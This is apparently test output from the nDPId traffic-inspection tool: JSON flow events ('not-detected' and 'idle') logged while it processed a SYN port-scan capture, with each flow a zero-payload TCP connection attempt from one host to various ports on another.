+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 